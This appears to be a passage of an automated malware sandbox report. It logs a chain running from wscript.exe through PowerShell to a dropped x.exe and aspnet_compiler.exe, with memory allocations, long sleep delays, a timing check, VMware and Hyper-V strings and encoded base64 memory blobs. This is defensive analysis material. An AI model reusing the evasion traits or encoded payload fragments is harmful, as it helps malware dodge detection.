          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 51E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 61E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6310000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD1C0 rdtsc 5_2_010FD1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3013Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2899Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.8 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4520Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3608Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 280Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000001.00000002.1778974115.000001EFD92CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wscript.exe, 00000000.00000003.1787171415.00000163D6950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: wscript.exe, 00000000.00000003.1787171415.00000163D6950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: wscript.exe, 00000000.00000002.1789349275.00000163D6361000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\m
          Source: wscript.exe, 00000000.00000002.1789293370.00000163D62F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.1785872374.00000163D433B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1786628791.00000163D4340000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1789037038.00000163D4340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
          Source: wscript.exe, 00000000.00000003.1787093158.00000163D6A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kCp6h2d30C2kXbqRTgcQUYKSzhmwY9YS8p11LU7knEMHW/ZzcXjuI6xI5NNggCSWmyKvQ7Veu8Uq2butfYuwSr1bZa4ktbSsX8nTKs40TBLIW4SMutctNBocjC7RHc1TT6l/jDhid3cXOJXBdcFOpVTVhwuTfrlryZrW2prNdAVChuBL5VMypztDW0HHyESADUX3A/R505vhMr0nMANJ6gCqKfkx9yK5MKqEXrS/vJZcA/LLk0QitfGVCe9tR2t520IHlKMF4nvpHaeKtERkcdWigcHo+rs7eS3WDVsqX6kMZdybveJDBVCiUApfPEv+ESIt62QXNyXhnH0cbbknoVD2dJrus4PsqkufxpsslZ+ROhSMy24dt7aGHVld5PbruCHSx+vKyKDB4PrdjMTe/Z4lE0TcsOfBfFk0E0NMO71nWGVzU25uEfJ1JMOVM7vQg8YVKmQIjSMxfPLwrxfoIahlftWq2m04PQCWLmzxpmEveZhaK8VL7XQ3AplgF4loR+Qc1cS5nIwdIgnJh2YE/WS13n0+FjVV/9fqs8f1gsLX7HOUO5Guv3M5QFyAQeMU/N4QBeZC2qNdL3Tu/fAs5QA7XH+ivrgCUnV57S8Hi8rlt0gEfr+SrncPIoJHnpjeEE86IPwFhaQErxWAWu4C9HQ3GnKspC26VMS/ev3YHd8Pm3pJNRB/k3Ac+Bd8bS7UfexMo8YsEjeLzNudTpNJvLrHx/iktwhB3MFo8pEZKa3UdprnVk1smVbg6Q4O7Y+5oIqmsxnhiXoi16gAdSz/fdUlgs0auOj9oacCcU3d3j7JE3/GVMVUUCtIK6uyHVcG7T+WDNig4tXwjMLBn4Jv3b1N9yFA8NB8XaFrTgdrnCKjFC584ugja06O9UFsAw+9BaFxjNV97Q4fZYx0yM1eQJrK36HQo8o7Fx6/c0+jHNrhFBWAy2NyCZOU+70ekbIsT577kINLFkVfi6d7mJk9ZC2Kmd8lgpw8bzvQNgQ22Lx6P8xqBIUt5YvIKtqigRpAEEfKlWfNBEKkVtz74mnsZMdUy1COEn22gH7GwTfLDtduHSavX8JbBOypLM46xXrRYjXzenXplpMZeUhsIdu8Rz07b1Wn07AQU9mX4Hkos4FPeZHb3CEQrITqJaxXN71X5c+YlxNyR541y84vJSqlj+ncj7VB0lohqVCAj6v+AozbNyFISYs2eDaA4paX2UqCEHMqAdGXwWT7Yf05nqX6jZWGS99FXtvasUwY1QCkMuvbDNZgEkHsJEKLiCGGDY5hTf3AlnZCi1p3FI8BD7Gfg33G2UvHEmjt+qxEaCYKO7xyLR/oTMzg1HQFECL206T5KHBDkz5Cn1TMVgMWn/EkohLjhjfWRadfh2gzeUDKdZJsoXlCH3iHgu63d+dDWq72kaUKE2ybLcl4MsywM7I4AzBldbyKBHxI9k1j8b+fsASjBNWLAI5mTkgj9oYNocqF8nhX7PPrFakpfP39t4M8UQWxBl34XmUEx3QZa6MKdKTWT2NxQ6KI69E07w/59XUcH2pC/l+liaxbREwG/9HjwXN5XLU8pe1spMWB+iC1f6TJUjv1rIlWCb/phSfQLNdx35UcK/awzKNZzxOcEbHHa94g70O26wmk52nnLS+5JUNrQ56Oh3wp9pwKTwRb++aU3SLDN7+V6NXZZDq37Zc8tX9EmpmBQAGdKQk6a+ySjqj0toeQmr4lWh0avVu0Qq/vxdzni2WafF1X3WgqHXABjoTTak8Znl6U8poWohLc1bCOeto10G3QYjYYyNDHf3cv8UKh6Ag5ULIDl/iSvXFN6jqnEd8q/E4gAnc9MP+jjK037pBVvNfcnZ0OrIYny5KosqRG2KKQs4FOayGp+doMkXfylKSsAvaW6ewQ5WSojdkSCv9YgT/Uty+asl9NTz5WC2iHgZwTod920i1Vvi8u52MhFiqgy3Y4ChQOiV9RXUb+cDRfehxOBeW80FlnoDrNKu6ymzTGIiOY3kKinqlYCH/Y65qoPDHd/pGVWURHOLG74Ucd8PkVZMzwRTnN
          Source: powershell.exe, 00000001.00000002.1778974115.000001EFD92F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42efc
          Source: wscript.exe, 00000000.00000003.1785872374.00000163D433B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1786628791.00000163D4340000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1789037038.00000163D4340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
